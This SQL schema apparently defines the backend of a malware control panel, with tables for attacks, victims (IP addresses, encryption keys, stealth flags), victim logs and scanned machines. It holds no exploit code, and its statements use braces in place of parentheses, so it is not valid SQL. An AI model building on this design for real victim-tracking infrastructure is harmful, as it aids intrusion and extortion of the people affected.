CREATE TABLE USERS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    LASTNAME VARCHAR(255) NOT NULL,
    FIRSTNAME VARCHAR(255) NOT NULL,
    EMAIL VARCHAR(255) NOT NULL,
    PASSWORD VARCHAR(255) NOT NULL,
    ROLE VARCHAR(255) NOT NULL,
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP
}

CREATE TABLE GROUPS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    NAME VARCHAR(255) NOT NULL,
    IMAGE VARCHAR(255),
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP
}

CREATE TABLE GROUP_LOGS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    GROUP_ID INT NOT NULL,
    LOG VARCHAR(255) NOT NULL,
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (GROUP_ID) REFERENCES GROUPS(ID)
}

CREATE TABLE ATTACKS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    GROUP_ID INT NOT NULL,
    TYPE VARCHAR(255) NOT NULL,
    STATE VARCHAR(255) NOT NULL,
    TEXT VARCHAR(255),
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (GROUP_ID) REFERENCES GROUPS(ID)
}

CREATE TABLE VICTIMS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    UID VARCHAR(255) NOT NULL,
    IP VARCHAR(255) NOT NULL,
    SYM_KEY VARCHAR(255),
    PUB_KEY VARCHAR(255),
    STEALTH BOOLEAN NOT NULL,
    MULTI_THREAD BOOLEAN NOT NULL,
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP
}

CREATE TABLE VICTIM_GROUPS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    VICTIM_ID INT NOT NULL,
    GROUP_ID INT NOT NULL,
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (VICTIM_ID) REFERENCES VICTIMS(ID),
    FOREIGN KEY (GROUP_ID) REFERENCES GROUPS(ID)
}

CREATE TABLE VICTIM_LOGS{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    VICTIM_ID INT NOT NULL,
    LOG VARCHAR(255) NOT NULL,
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (VICTIM_ID) REFERENCES VICTIMS(ID)
}

CREATE TABLE SCANNED_MACHINES{
    ID INT PRIMARY KEY AUTO_INCREMENT,
    VICTIM_ID INT NOT NULL,
    TYPE VARCHAR(255) NOT NULL,
    VERSION VARCHAR(255) NOT NULL,
    IP VARCHAR(255) NOT NULL,
    TEXT VARCHAR(255),
    CREATED_AT TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
    FOREIGN KEY (VICTIM_ID) REFERENCES VICTIMS(ID)
}

